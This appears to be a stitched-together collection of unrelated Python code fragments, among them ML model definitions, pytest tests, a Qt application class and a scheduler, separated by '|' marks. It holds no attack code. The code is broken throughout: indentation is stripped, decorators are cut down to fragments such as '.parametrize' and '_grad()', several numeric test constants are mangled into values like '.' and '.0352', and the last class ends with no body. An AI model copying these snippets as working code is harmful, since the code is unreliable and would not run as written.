api.add_resource(FooResource, '/api')
resp = client.get('/api')
assert (resp.status_code == 200)
assert (resp.data.decode('utf-8') == '{"foo": 3.0}\n') |
def _test_sharding_from_meta(tables: List[EmbeddingBagConfig], rank: int, world_size: int, sharder: ModuleSharder[nn.Module], backend: str, local_size: Optional[int]=None, use_fp_collection: bool=False) -> None:
with MultiProcessContext(rank, world_size, backend, local_size) as ctx:
(sparse_arch, sharded_sparse_arch) = get_unsharded_and_sharded_module(tables, sharder, use_dmp=True, use_fp_collection=use_fp_collection, init_device=torch.device('meta'), ctx=ctx)
state_dict = sharded_sparse_arch.state_dict()
for (key, param) in state_dict.items():
if ('_feature_processors' not in key):
continue
assert (not param.is_meta), f'Parameter {key} is still meta after sharding'
torch.testing.assert_close(param, torch.ones_like(param)) |
class PairClassificationPipeline(Pipeline):
def _sanitize_parameters(self, **kwargs):
preprocess_kwargs = {}
if ('second_text' in kwargs):
preprocess_kwargs['second_text'] = kwargs['second_text']
return (preprocess_kwargs, {}, {})
def preprocess(self, text, second_text=None):
return self.tokenizer(text, text_pair=second_text, return_tensors=self.framework)
def _forward(self, model_inputs):
return self.model(**model_inputs)
def postprocess(self, model_outputs):
logits = model_outputs.logits[0].numpy()
probabilities = softmax(logits)
best_class = np.argmax(probabilities)
label = self.model.config.id2label[best_class]
score = probabilities[best_class].item()
logits = logits.tolist()
return {'label': label, 'score': score, 'logits': logits} |
def _float_to_int(api: CheckerPluginInterface, typ: Type) -> Type:
typ = get_proper_type(typ)
if isinstance(typ, Instance):
if (typ.type.fullname == 'builtins.float'):
return api.named_generic_type('builtins.int', [])
elif typ.args:
return typ.copy_modified(args=[_float_to_int(api, t) for t in typ.args])
return typ |
def test_close(win32rawprinter, caplog, mocker):
PyPrinterHANDLE = mocker.Mock()
PyPrinterHANDLE.return_value = 0
mocker.patch('escpos.printer.Win32Raw.printers', new={'test_printer': 'Test'})
win32rawprinter.printer_name = 'test_printer'
assert (win32rawprinter.printer_name in win32rawprinter.printers)
mocker.patch('win32print.OpenPrinter', new=PyPrinterHANDLE)
win32rawprinter.open()
with caplog.at_level(logging.INFO):
mocker.patch('win32print.EndPagePrinter')
mocker.patch('win32print.EndDocPrinter')
mocker.patch('win32print.ClosePrinter')
win32rawprinter.close()
assert ('Closing' in caplog.text)
assert (win32rawprinter._device is False) |
def check_filter(qdmr_args, i_op, qdmr, change_stage=0):
ok = True
corrected = None
ok = (ok and (len(qdmr_args) == 2))
ok = (ok and QdmrInstance.is_good_qdmr_ref(qdmr_args[0], i_op))
matches = re.findall(BETWEEN_RE_PATTERN, qdmr_args[1], flags=re.IGNORECASE)
if matches:
ok = False
group = matches[0]
corrected = insert_qdmr_op('filter', [qdmr_args[0], ' '.join([group[0].strip(), 'betweenleftside', group[1].strip()]).strip()], i_op, qdmr)
corrected.ops[(i_op + 1)] = 'filter'
corrected.args[(i_op + 1)] = [QdmrInstance.index_to_ref(i_op), ' '.join([group[0].strip(), 'betweenrightside', group[2].strip()]).strip()]
return (ok, corrected) |
def _get_namedtuple_fields(node: nodes.Call) -> str:
names = []
container = None
try:
container = next(node.args[1].infer())
except (InferenceError, StopIteration) as exc:
raise UseInferenceDefault from exc
except IndexError:
pass
if (not container):
for keyword_node in node.keywords:
if (keyword_node.arg == 'field_names'):
try:
container = next(keyword_node.value.infer())
except (InferenceError, StopIteration) as exc:
raise UseInferenceDefault from exc
break
if (not isinstance(container, nodes.BaseContainer)):
raise UseInferenceDefault
for elt in container.elts:
if isinstance(elt, nodes.Const):
names.append(elt.as_string())
continue
if (not isinstance(elt, (nodes.List, nodes.Tuple))):
raise UseInferenceDefault
if (len(elt.elts) != 2):
raise UseInferenceDefault
names.append(elt.elts[0].as_string())
if names:
field_names = f"({','.join(names)},)"
else:
field_names = ''
return field_names |
class Scheduler():
def __init__(self, core):
self.pyload = core
self._ = core._
self.queue = PriorityQueue()
def add_job(self, t, call, args=[], kwargs={}, threaded=True):
d = Deferred()
t += time.time()
j = Job(t, call, args, kwargs, d, threaded)
self.queue.put((t, j))
return d
def remove_job(self, d):
index = (- 1)
for (i, j) in enumerate(self.queue):
if (j[1].deferred == d):
index = i
if (index >= 0):
del self.queue[index]
return True
return False
def run(self):
while True:
(t, j) = self.queue.get()
if (not j):
break
elif (t <= time.time()):
j.start()
else:
self.queue.put((t, j))
break |
def test_top_down_JHMDB_dataset_compatibility():
dataset = 'TopDownJhmdbDataset'
dataset_class = DATASETS.get(dataset)
dataset_class.load_annotations = MagicMock()
dataset_class.coco = MagicMock()
channel_cfg = dict(num_output_channels=15, dataset_joints=15, dataset_channel=[[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14]], inference_channel=[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14])
data_cfg = dict(image_size=[192, 256], heatmap_size=[48, 64], num_output_channels=channel_cfg['num_output_channels'], num_joints=channel_cfg['dataset_joints'], dataset_channel=channel_cfg['dataset_channel'], inference_channel=channel_cfg['inference_channel'], soft_nms=False, nms_thr=1.0, oks_thr=0.9, vis_thr=0.2, use_gt_bbox=True, det_bbox_thr=0.0, bbox_file='')
with pytest.raises(AssertionError):
data_cfg_copy = copy.deepcopy(data_cfg)
data_cfg_copy['use_gt_bbox'] = False
with pytest.warns(DeprecationWarning):
_ = dataset_class(ann_file='tests/data/jhmdb/test_jhmdb_sub1.json', img_prefix='tests/data/jhmdb/', data_cfg=data_cfg_copy, pipeline=[], test_mode=True)
with pytest.warns(DeprecationWarning):
_ = dataset_class(ann_file='tests/data/jhmdb/test_jhmdb_sub1.json', img_prefix='tests/data/jhmdb/', data_cfg=data_cfg_copy, pipeline=[], test_mode=False)
with pytest.warns(DeprecationWarning):
custom_dataset = dataset_class(ann_file='tests/data/jhmdb/test_jhmdb_sub1.json', img_prefix='tests/data/jhmdb/', data_cfg=data_cfg, pipeline=[], test_mode=True)
assert (custom_dataset.test_mode is True)
assert (custom_dataset.dataset_name == 'jhmdb')
image_id = 2290001
assert (image_id in custom_dataset.img_ids)
assert (len(custom_dataset.img_ids) == 3)
_ = custom_dataset[0]
outputs = convert_db_to_output(custom_dataset.db)
with tempfile.TemporaryDirectory() as tmpdir:
infos = custom_dataset.evaluate(outputs, tmpdir, ['PCK'])
assert_almost_equal(infos['Mean PCK'], 1.0)
infos = custom_dataset.evaluate(outputs, tmpdir, ['tPCK'])
assert_almost_equal(infos['Mean tPCK'], 1.0)
with pytest.raises(KeyError):
_ = custom_dataset.evaluate(outputs, tmpdir, 'mAP') |
class AddressBook(Base):
__tablename__ = 'access_address_book'
id = Column(Integer, primary_key=True)
owner_id = Column(Integer, ForeignKey(EmailAndPasswordSystemAccount.id), nullable=False)
owner = relationship(EmailAndPasswordSystemAccount)
collaborators = relationship('reahl.doc.examples.tutorial.accessbootstrap.accessbootstrap.Collaborator', lazy='dynamic', backref='address_book')
def by_id(cls, address_book_id, exception_to_raise):
address_books = Session.query(cls).filter_by(id=address_book_id)
if (address_books.count() != 1):
raise exception_to_raise
return address_books.one()
def owned_by(cls, account):
return Session.query(cls).filter_by(owner=account)
def address_books_visible_to(cls, account):
visible_books = Session.query(cls).join(Collaborator).filter((Collaborator.account == account)).all()
visible_books.extend(cls.owned_by(account))
return visible_books
fields = ExposedNames()
fields.chosen_collaborator = (lambda i: ChoiceField([Choice(i.id, IntegerField(label=i.email)) for i in Session.query(EmailAndPasswordSystemAccount).all()], label='Choose collaborator'))
fields.may_edit_address = (lambda i: BooleanField(label='May edit existing addresses'))
fields.may_add_address = (lambda i: BooleanField(label='May add new addresses'))
events = ExposedNames()
events.add_collaborator = (lambda i: Event(label='Share', action=Action(i.add_collaborator)))
def add_collaborator(self):
chosen_account = Session.query(EmailAndPasswordSystemAccount).filter_by(id=self.chosen_collaborator).one()
self.allow(chosen_account, can_add_addresses=self.may_add_address, can_edit_addresses=self.may_edit_address)
def addresses(self):
return Session.query(Address).filter_by(address_book=self).all()
def display_name(self):
return ('Address book of %s' % self.owner.email)
def allow(self, account, can_add_addresses=False, can_edit_addresses=False):
Session.query(Collaborator).filter_by(address_book=self, account=account).delete()
Collaborator(address_book=self, account=account, can_add_addresses=can_add_addresses, can_edit_addresses=can_edit_addresses)
def can_be_edited_by(self, account):
if (account is self.owner):
return True
collaborator = self.get_collaborator(account)
return ((collaborator and collaborator.can_edit_addresses) or self.can_be_added_to_by(account))
def can_be_added_to_by(self, account):
if (account is self.owner):
return True
collaborator = self.get_collaborator(account)
return (collaborator and collaborator.can_add_addresses)
def can_be_added_to(self):
account = LoginSession.for_current_session().account
return self.can_be_added_to_by(account)
def collaborators_can_be_added_by(self, account):
return (self.owner is account)
def collaborators_can_be_added(self):
account = LoginSession.for_current_session().account
return self.collaborators_can_be_added_by(account)
def is_visible_to(self, account):
return (self in self.address_books_visible_to(account))
def is_visible(self):
account = LoginSession.for_current_session().account
return self.is_visible_to(account)
def get_collaborator(self, account):
collaborators = self.collaborators.filter_by(account=account)
count = collaborators.count()
if (count == 1):
return collaborators.one()
if (count > 1):
raise ProgrammerError('There can be only one Collaborator per account. Here is more than one.')
return None |
class PPL():
FFHQ_CROP = [((1 / 8) * 3), ((1 / 8) * 7), ((1 / 8) * 2), ((1 / 8) * 6)]
def __init__(self, G, prior_generator, device=None, num_samples=50000, epsilon=0.0001, use_dlatent=True, full_sampling=False, crop=None, lpips_model=None, lpips_size=None):
device_ids = []
if isinstance(G, torch.nn.DataParallel):
device_ids = G.device_ids
G = utils.unwrap_module(G)
assert isinstance(G, models.Generator)
assert isinstance(prior_generator, utils.PriorGenerator)
if (device is None):
device = next(G.parameters()).device
else:
device = torch.device(device)
assert (torch.device(prior_generator.device) == device), (('Prior generator device ({}) '.format(torch.device(prior_generator)) + 'is not the same as the specified (or infered from the model)') + 'device ({}) for the PPL evaluation.'.format(device))
G.eval().to(device)
self.G_mapping = G.G_mapping
self.G_synthesis = G.G_synthesis
if device_ids:
self.G_mapping = torch.nn.DataParallel(self.G_mapping, device_ids=device_ids)
self.G_synthesis = torch.nn.DataParallel(self.G_synthesis, device_ids=device_ids)
self.prior_generator = prior_generator
self.device = device
self.num_samples = num_samples
self.epsilon = epsilon
self.use_dlatent = use_dlatent
self.full_sampling = full_sampling
self.crop = crop
self.batch_size = self.prior_generator.batch_size
if (lpips_model is None):
warnings.warn(((('Using default LPIPS distance metric based on VGG 16. ' + 'This metric will only work on image data where values are in ') + 'the range [-1, 1], please specify an lpips module if you want ') + 'to use other kinds of data formats.'))
lpips_model = lpips.LPIPS_VGG16(pixel_min=(- 1), pixel_max=1)
if device_ids:
lpips_model = torch.nn.DataParallel(lpips_model, device_ids=device_ids)
lpips_size = (lpips_size or 256)
self.lpips_model = lpips_model.eval().to(device)
self.lpips_size = lpips_size
def _scale_for_lpips(self, data):
if (not self.lpips_size):
return data
scale_factor = (self.lpips_size / min(data.size()[2:]))
if (scale_factor == 1):
return data
mode = 'nearest'
if (scale_factor < 1):
mode = 'area'
return F.interpolate(data, scale_factor=scale_factor, mode=mode)
def crop_data(self, data):
if (not self.crop):
return data
dim = (data.dim() - 2)
if isinstance(self.crop, numbers.Number):
self.crop = [self.crop]
else:
self.crop = list(self.crop)
if (len(self.crop) == 1):
self.crop = ([self.crop[0], ((1 if (self.crop[0] < 1) else size) - self.crop[0])] * dim)
if (len(self.crop) == dim):
crop = self.crop
self.crop = []
for value in crop:
self.crop += [value, ((1 if (value < 1) else size) - value)]
assert (len(self.crop) == (2 * dim)), (('Crop values has to be ' + 'a single value or a sequence of values of the same ') + 'size as number of dimensions of the data or twice of that.')
pre_index = [Ellipsis]
post_index = [slice(None, None, None) for _ in range(dim)]
for i in range(0, (2 * dim), 2):
j = (i // 2)
size = data.size((2 + j))
(crop_min, crop_max) = self.crop[i:(i + 2)]
if (crop_max < 1):
(crop_min, crop_max) = ((crop_min * size), (crop_max * size))
(crop_min, crop_max) = (max(0, int(crop_min)), min(size, int(crop_max)))
dim_index = post_index.copy()
dim_index[j] = slice(crop_min, crop_max, None)
data = data[(pre_index + dim_index)]
return data
def prep_latents(self, latents):
if self.full_sampling:
lerp = utils.slerp
if self.use_dlatent:
lerp = utils.lerp
(latents_a, latents_b) = (latents[:self.batch_size], latents[self.batch_size:])
latents = lerp(latents_a, latents_b, torch.rand(latents_a.size()[:(- 1)], dtype=latents_a.dtype, device=latents_a.device).unsqueeze((- 1)))
return torch.cat([latents, (latents + self.epsilon)], dim=0)
def __call__(self, *args, **kwargs):
return self.evaluate(*args, **kwargs)
def evaluate(self, verbose=True):
distances = []
batch_size = self.batch_size
if self.full_sampling:
batch_size = (2 * batch_size)
if verbose:
progress = utils.ProgressWriter(np.ceil((self.num_samples / self.batch_size)))
progress.write('PPL: Evaluating metric...', step=False)
for _ in range(0, self.num_samples, self.batch_size):
utils.unwrap_module(self.G_synthesis).static_noise()
(latents, latent_labels) = self.prior_generator(batch_size=batch_size)
if ((latent_labels is not None) and self.full_sampling):
latent_labels = latent_labels.view(2, (- 1))[0].repeat(2)
if self.use_dlatent:
with torch.no_grad():
dlatents = self.G_mapping(latents=latents, labels=latent_labels)
dlatents = self.prep_latents(dlatents)
else:
latents = self.prep_latents(latents)
with torch.no_grad():
dlatents = self.G_mapping(latents=latents, labels=latent_labels)
dlatents = dlatents.unsqueeze(1).repeat(1, len(utils.unwrap_module(self.G_synthesis)), 1)
with torch.no_grad():
output = self.G_synthesis(dlatents)
output = self.crop_data(output)
output = self._scale_for_lpips(output)
(output_a, output_b) = (output[:self.batch_size], output[self.batch_size:])
with torch.no_grad():
dist = self.lpips_model(output_a, output_b)
distances.append((dist.cpu() * (1 / (self.epsilon ** 2))))
if verbose:
progress.step()
if verbose:
progress.write('PPL: Evaluated!', step=False)
progress.close()
distances = torch.cat(distances, dim=0).numpy()
lo = np.percentile(distances, 1, interpolation='lower')
hi = np.percentile(distances, 99, interpolation='higher')
filtered_distances = np.extract(np.logical_and((lo <= distances), (distances <= hi)), distances)
return float(np.mean(filtered_distances)) |
class TestWithRootDir(TestOSRelease):
def setup_method(self, test_method: FunctionType) -> None:
dist = test_method.__name__.split('_')[1]
root_dir = os.path.join(DISTROS_DIR, dist)
self.distro = distro.LinuxDistribution(include_lsb=False, include_uname=False, include_oslevel=False, os_release_file='', distro_release_file='path-to-non-existing-file', root_dir=root_dir) |
def correct_pad(kernel_size: Union[(int, Tuple)], adjust: bool=True):
if isinstance(kernel_size, int):
kernel_size = (kernel_size, kernel_size)
correct = ((kernel_size[0] // 2), (kernel_size[1] // 2))
if adjust:
return ((correct[1] - 1), correct[1], (correct[0] - 1), correct[0])
else:
return (correct[1], correct[1], correct[0], correct[0]) |
class HelpApp(cmd2.Cmd):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def do_squat(self, arg):
pass
def help_squat(self):
self.stdout.write('This command does diddly squat...\n')
def do_edit(self, arg):
pass
def do_undoc(self, arg):
pass
def do_multiline_docstr(self, arg):
pass |
class LE(LogicalComparison):
identity = False
commutative = False
associative = False
nfunc_spec = ('less_equal', 2, 1)
def impl(self, x, y):
return np.less_equal(x, y)
def c_code(self, node, name, inputs, outputs, sub):
(x, y) = inputs
(z,) = outputs
if (node.inputs[0].type in complex_types):
raise NotImplementedError()
return f'{z} = ({x} <= {y});' |
.parametrize('data_fcn, plot_fcn, mimo', [(control.step_response, control.time_response_plot, True), (control.step_response, control.TimeResponseData.plot, True), (control.frequency_response, control.FrequencyResponseData.plot, True), (control.frequency_response, control.bode, True), (control.frequency_response, control.bode_plot, True), (control.nyquist_response, control.nyquist_plot, False)])
def test_response_plot_kwargs(data_fcn, plot_fcn, mimo):
if mimo:
response = data_fcn(control.rss(4, 2, 2))
else:
response = data_fcn(control.rss(4, 1, 1))
with pytest.raises((AttributeError, TypeError), match='(has no property|unexpected keyword|unrecognized keyword)'):
data_fcn(control.rss(2, 1, 1), unknown=None)
plot_fcn(response)
with pytest.raises(AttributeError, match='(has no property|unexpected keyword)'):
plot_fcn(response, unknown=None)
response.plot()
with pytest.raises(AttributeError, match='(has no property|unexpected keyword)'):
response.plot(unknown=None) |
class DataArguments():
is_blank: Optional[bool] = field(default=False)
image_res: Optional[int] = field(default=512)
img_root_dir: str = field(default='../../PMC-VQA/images/', metadata={'help': 'Path to the training data.'})
Train_csv_path: str = field(default='../../PMC-VQA/train.csv', metadata={'help': 'Path to the training data.'})
Test_csv_path: str = field(default='../../PMC-VQA/test.csv', metadata={'help': 'Path to the training data.'}) |
def test_SumScaler_no_change_original_dm(decision_matrix):
dm = decision_matrix(seed=42, min_alternatives=10, max_alternatives=10, min_criteria=20, max_criteria=20, min_objectives_proportion=0.5)
expected = dm.copy()
scaler = SumScaler(target='both')
dmt = scaler.transform(dm)
assert (dm.equals(expected) and (not dmt.equals(expected)) and (dm is not expected)) |
class ThresholdReducer(BaseReducer):
def __init__(self, low=None, high=None, **kwargs):
super().__init__(**kwargs)
assert ((low is not None) or (high is not None)), 'At least one of low or high must be specified'
self.low = low
self.high = high
if (self.low is not None):
self.add_to_recordable_attributes(list_of_names=['low'], is_stat=False)
if (self.high is not None):
self.add_to_recordable_attributes(list_of_names=['high'], is_stat=False)
def element_reduction(self, losses, loss_indices, embeddings, labels):
return self.element_reduction_helper(losses, embeddings, 'elements')
def pos_pair_reduction(self, losses, loss_indices, embeddings, labels):
return self.element_reduction_helper(losses, embeddings, 'pos_pairs')
def neg_pair_reduction(self, losses, loss_indices, embeddings, labels):
return self.element_reduction_helper(losses, embeddings, 'neg_pairs')
def triplet_reduction(self, losses, loss_indices, embeddings, labels):
return self.element_reduction_helper(losses, embeddings, 'triplets')
def element_reduction_helper(self, losses, embeddings, attr_name):
low_condition = ((losses > self.low) if (self.low is not None) else True)
high_condition = ((losses < self.high) if (self.high is not None) else True)
threshold_condition = (low_condition & high_condition)
num_past_filter = torch.sum(threshold_condition)
if (num_past_filter >= 1):
loss = torch.mean(losses[threshold_condition])
else:
loss = self.zero_loss(embeddings)
self.set_stats(low_condition, high_condition, num_past_filter, attr_name)
return loss
def set_stats(self, low_condition, high_condition, num_past_filter, attr_name):
if self.collect_stats:
curr_attr_name = '{}_past_filter'.format(attr_name)
self.add_to_recordable_attributes(name=curr_attr_name, is_stat=True)
setattr(self, curr_attr_name, num_past_filter.item())
with torch.no_grad():
if (self.low is not None):
curr_attr_name = '{}_above_low'.format(attr_name)
self.add_to_recordable_attributes(name=curr_attr_name, is_stat=True)
setattr(self, curr_attr_name, torch.sum(low_condition).item())
if (self.high is not None):
curr_attr_name = '{}_below_high'.format(attr_name)
self.add_to_recordable_attributes(name=curr_attr_name, is_stat=True)
setattr(self, curr_attr_name, torch.sum(high_condition).item()) |
def read_minimal_logic_db(data: (dict | None)) -> (MinimalLogicData | None):
if (data is None):
return None
return MinimalLogicData(items_to_exclude=[IndexWithReason(it['name'], it.get('when_shuffled')) for it in data['items_to_exclude']], custom_item_amount={it['name']: it['value'] for it in data['custom_item_amount']}, events_to_exclude=[IndexWithReason(it['name'], it.get('reason')) for it in data['events_to_exclude']], description=data['description']) |
class DAT(nn.Module):
def __init__(self, img_size=224, patch_size=4, num_classes=1000, expansion=4, dim_stem=96, dims=[96, 192, 384, 768], depths=[2, 2, 18, 2], heads=[3, 6, 12, 24], window_sizes=[7, 7, 7, 7], drop_rate=0.0, attn_drop_rate=0.0, drop_path_rate=0.3, strides=[(- 1), (- 1), 1, 1], offset_range_factor=[(- 1), (- 1), 2, 2], stage_spec=[['L', 'S'], ['L', 'S'], ['L', 'D', 'L', 'D', 'L', 'D', 'L', 'D', 'L', 'D', 'L', 'D', 'L', 'D', 'L', 'D', 'L', 'D'], ['L', 'D']], groups=[(- 1), (- 1), 3, 6], use_pes=[False, False, True, True], dwc_pes=[False, False, False, False], sr_ratios=[(- 1), (- 1), (- 1), (- 1)], fixed_pes=[False, False, False, False], no_offs=[False, False, False, False], ns_per_pts=[4, 4, 4, 4], use_dwc_mlps=[False, False, False, False], use_conv_patches=False, **kwargs):
super().__init__()
self.patch_proj = (nn.Sequential(nn.Conv2d(3, dim_stem, 7, patch_size, 3), LayerNormProxy(dim_stem)) if use_conv_patches else nn.Sequential(nn.Conv2d(3, dim_stem, patch_size, patch_size, 0), LayerNormProxy(dim_stem)))
img_size = (img_size // patch_size)
dpr = [x.item() for x in torch.linspace(0, drop_path_rate, sum(depths))]
self.stages = nn.ModuleList()
for i in range(4):
dim1 = (dim_stem if (i == 0) else (dims[(i - 1)] * 2))
dim2 = dims[i]
self.stages.append(TransformerStage(img_size, window_sizes[i], ns_per_pts[i], dim1, dim2, depths[i], stage_spec[i], groups[i], use_pes[i], sr_ratios[i], heads[i], strides[i], offset_range_factor[i], i, dwc_pes[i], no_offs[i], fixed_pes[i], attn_drop_rate, drop_rate, expansion, drop_rate, dpr[sum(depths[:i]):sum(depths[:(i + 1)])], use_dwc_mlps[i]))
img_size = (img_size // 2)
self.down_projs = nn.ModuleList()
for i in range(3):
self.down_projs.append((nn.Sequential(nn.Conv2d(dims[i], dims[(i + 1)], 3, 2, 1, bias=False), LayerNormProxy(dims[(i + 1)])) if use_conv_patches else nn.Sequential(nn.Conv2d(dims[i], dims[(i + 1)], 2, 2, 0, bias=False), LayerNormProxy(dims[(i + 1)]))))
self.cls_norm = LayerNormProxy(dims[(- 1)])
self.cls_head = nn.Linear(dims[(- 1)], num_classes)
self.reset_parameters()
def reset_parameters(self):
for m in self.parameters():
if isinstance(m, (nn.Linear, nn.Conv2d)):
nn.init.kaiming_normal_(m.weight)
nn.init.zeros_(m.bias)
_grad()
def load_pretrained(self, state_dict):
new_state_dict = {}
for (state_key, state_value) in state_dict.items():
keys = state_key.split('.')
m = self
for key in keys:
if key.isdigit():
m = m[int(key)]
else:
m = getattr(m, key)
if (m.shape == state_value.shape):
new_state_dict[state_key] = state_value
else:
if ('relative_position_index' in keys):
new_state_dict[state_key] = m.data
if ('q_grid' in keys):
new_state_dict[state_key] = m.data
if ('reference' in keys):
new_state_dict[state_key] = m.data
if ('relative_position_bias_table' in keys):
(n, c) = state_value.size()
l = int(math.sqrt(n))
assert (n == (l ** 2))
L = int(math.sqrt(m.shape[0]))
pre_interp = state_value.reshape(1, l, l, c).permute(0, 3, 1, 2)
post_interp = F.interpolate(pre_interp, (L, L), mode='bicubic')
new_state_dict[state_key] = post_interp.reshape(c, (L ** 2)).permute(1, 0)
if ('rpe_table' in keys):
(c, h, w) = state_value.size()
(C, H, W) = m.data.size()
pre_interp = state_value.unsqueeze(0)
post_interp = F.interpolate(pre_interp, (H, W), mode='bicubic')
new_state_dict[state_key] = post_interp.squeeze(0)
self.load_state_dict(new_state_dict, strict=False)
.ignore
def no_weight_decay(self):
return {'absolute_pos_embed'}
.ignore
def no_weight_decay_keywords(self):
return {'relative_position_bias_table', 'rpe_table'}
def forward(self, x):
x = self.patch_proj(x)
positions = []
references = []
outs = []
for i in range(4):
(x, pos, ref) = self.stages[i](x)
outs.append(x)
if (i < 3):
x = self.down_projs[i](x)
positions.append(pos)
references.append(ref)
return outs |
class ResNet(nn.Module):
def __init__(self, block=BasicBlock, keep_prob=1.0, avg_pool=False, drop_rate=0.0, dropblock_size=5):
self.inplanes = 3
super(ResNet, self).__init__()
self.layer1 = self._make_layer(block, 64, stride=2, drop_rate=drop_rate)
self.layer2 = self._make_layer(block, 160, stride=2, drop_rate=drop_rate)
self.layer3 = self._make_layer(block, 320, stride=2, drop_rate=drop_rate, drop_block=True, block_size=dropblock_size)
self.layer4 = self._make_layer(block, 640, stride=2, drop_rate=drop_rate, drop_block=True, block_size=dropblock_size)
if avg_pool:
self.avgpool = nn.AvgPool2d(5, stride=1)
self.keep_prob = keep_prob
self.keep_avg_pool = avg_pool
self.dropout = nn.Dropout(p=(1 - self.keep_prob), inplace=False)
self.drop_rate = drop_rate
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='leaky_relu')
elif isinstance(m, nn.BatchNorm2d):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
def _make_layer(self, block, planes, stride=1, drop_rate=0.0, drop_block=False, block_size=1):
downsample = None
if ((stride != 1) or (self.inplanes != (planes * block.expansion))):
downsample = nn.Sequential(nn.Conv2d(self.inplanes, (planes * block.expansion), kernel_size=1, stride=1, bias=False), nn.BatchNorm2d((planes * block.expansion)))
layers = []
layers.append(block(self.inplanes, planes, stride, downsample, drop_rate, drop_block, block_size))
self.inplanes = (planes * block.expansion)
return nn.Sequential(*layers)
def forward(self, x):
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.layer4(x)
x = F.adaptive_avg_pool2d(x, 1).squeeze((- 1)).squeeze((- 1))
return x |
def test_building_scenariooutline_scenarios(mocker):
scenario_outline = ScenarioOutline(1, 'Scenario Outline', 'Examples', 'I am a Scenario Outline', 'foo.feature', 1, parent=None, tags=None, preconditions=None, background=None)
scenario_outline.steps.extend([mocker.MagicMock(sentence='Given I have <foo>', path='foo.feature'), mocker.MagicMock(sentence='And I have <bar>', path='foo.feature'), mocker.MagicMock(sentence='When I add those', path='foo.feature')])
scenario_outline.examples_header = ['foo', 'bar']
scenario_outline.examples = [ScenarioOutline.Example(['1', '2'], 'foo.feature', 1), ScenarioOutline.Example(['3', '4'], 'foo.feature', 2)]
scenario_outline.build_scenarios()
assert (len(scenario_outline.scenarios) == 2)
assert all((isinstance(x, ExampleScenario) for x in scenario_outline.scenarios))
assert (scenario_outline.scenarios[0].sentence == 'I am a Scenario Outline - row 0')
assert (scenario_outline.scenarios[1].sentence == 'I am a Scenario Outline - row 1')
assert (scenario_outline.scenarios[0].steps[0].sentence == 'Given I have 1')
assert (scenario_outline.scenarios[0].steps[1].sentence == 'And I have 2')
assert (scenario_outline.scenarios[0].steps[2].sentence == 'When I add those')
assert (scenario_outline.scenarios[1].steps[0].sentence == 'Given I have 3')
assert (scenario_outline.scenarios[1].steps[1].sentence == 'And I have 4')
assert (scenario_outline.scenarios[1].steps[2].sentence == 'When I add those') |
class OHNMLoss(nn.Module):
def __init__(self, neg_ratio=3.0):
super(OHNMLoss, self).__init__()
self.neg_ratio = neg_ratio
def forward(self, input, target):
pos_logits = input[(target > 0)]
pos_labels = target[(target > 0)]
neg_logits = input[(target == 0)]
neg_labels = target[(target == 0)]
pos_num = pos_logits.numel()
neg_num = int((pos_num * self.neg_ratio))
(neg_logits, neg_indices) = neg_logits.topk(neg_num)
neg_labels = neg_labels[neg_indices]
loss = F.binary_cross_entropy_with_logits(torch.cat([pos_logits, neg_logits]), torch.cat([pos_labels, neg_labels]), reduction='mean')
return loss |
class TestKernelBWLookup(unittest.TestCase):
def test_uvm_caching_bw(self) -> None:
compute_device: str = 'cuda'
computer_kernel: str = EmbeddingComputeKernel.FUSED_UVM_CACHING.value
caching_ratios: List[float] = [0, 0.25, 0.5, 0.75, 1]
uvm_caching_bw: list[Optional[float]] = [kernel_bw_lookup(compute_device, computer_kernel, HBM_MEM_BW, DDR_MEM_BW, caching_ratio) for caching_ratio in caching_ratios]
expected_uvm_caching_bw: List[float] = [.96448, ., ., .0352, .6128]
self.assertEqual(expected_uvm_caching_bw, uvm_caching_bw)
def test_uvm_caching_bw_with_prefetch_pipeline(self) -> None:
compute_device: str = 'cuda'
computer_kernel: str = EmbeddingComputeKernel.FUSED_UVM_CACHING.value
prefetch_pipeline: bool = True
caching_ratios: List[float] = [0, 0.25, 0.5, 0.75, 1]
uvm_caching_bw: list[Optional[float]] = [kernel_bw_lookup(compute_device, computer_kernel, HBM_MEM_BW, DDR_MEM_BW, caching_ratio, prefetch_pipeline) for caching_ratio in caching_ratios]
expected_uvm_caching_bw: List[float] = [.128, .128, .128, .128, .128]
self.assertEqual(expected_uvm_caching_bw, uvm_caching_bw) |
def get_model_test_files():
_ignore_files = ['test_modeling_common', 'test_modeling_encoder_decoder', 'test_modeling_flax_encoder_decoder', 'test_modeling_flax_speech_encoder_decoder', 'test_modeling_marian', 'test_modeling_tf_common', 'test_modeling_tf_encoder_decoder']
test_files = []
for file_or_dir in os.listdir(PATH_TO_TESTS):
path = os.path.join(PATH_TO_TESTS, file_or_dir)
if os.path.isdir(path):
filenames = [os.path.join(file_or_dir, file) for file in os.listdir(path)]
else:
filenames = [file_or_dir]
for filename in filenames:
if (os.path.isfile(os.path.join(PATH_TO_TESTS, filename)) and ('test_modeling' in filename) and (not (os.path.splitext(filename)[0] in _ignore_files))):
test_files.append(filename)
return test_files |
class Application(QApplication):
new_window = pyqtSignal(mainwindow.MainWindow)
window_closing = pyqtSignal(mainwindow.MainWindow)
def __init__(self, args):
self._last_focus_object = None
qt_args = qtargs.qt_args(args)
log.init.debug('Commandline args: {}'.format(sys.argv[1:]))
log.init.debug('Parsed: {}'.format(args))
log.init.debug('Qt arguments: {}'.format(qt_args[1:]))
super().__init__(qt_args)
objects.args = args
log.init.debug('Initializing application...')
self.launch_time = datetime.datetime.now()
self.focusObjectChanged.connect(self.on_focus_object_changed)
if machinery.IS_QT5:
self.setAttribute(Qt.ApplicationAttribute.AA_UseHighDpiPixmaps, True)
self.new_window.connect(self._on_new_window)
(mainwindow.MainWindow)
def _on_new_window(self, window):
window.tabbed_browser.shutting_down.connect(functools.partial(self.window_closing.emit, window))
(QObject)
def on_focus_object_changed(self, obj):
output = qtutils.qobj_repr(obj)
if (self._last_focus_object != output):
log.misc.debug('Focus object changed: {}'.format(output))
self._last_focus_object = output
def event(self, e):
if (e.type() != QEvent.Type.FileOpen):
return super().event(e)
url = e.url()
if url.isValid():
open_url(url, no_raise=True)
else:
message.error('Invalid URL: {}'.format(url.errorString()))
return True
def __repr__(self):
return utils.get_repr(self) |
class UserMemoryManager():
